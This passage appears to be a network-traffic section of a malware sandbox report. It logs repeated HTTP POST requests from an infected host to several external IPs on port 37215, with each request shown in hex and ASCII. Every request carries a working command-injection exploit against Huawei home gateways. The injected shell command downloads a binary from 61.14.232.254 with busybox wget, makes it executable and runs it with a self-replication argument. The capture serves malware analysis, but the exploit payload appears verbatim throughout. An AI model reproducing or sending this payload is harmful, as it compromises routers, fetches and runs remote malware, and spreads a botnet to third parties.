                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522665024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2235192.168.2.1337908217.176.174.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.742721081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042720079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522656918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2236192.168.2.1339166197.77.214.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.742752075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042709112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522648096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2237192.168.2.135144219.181.227.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.743290901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042716980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522665024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2238192.168.2.13506965.235.222.3837215
                                                  TimestampBytes transferredDirectionData
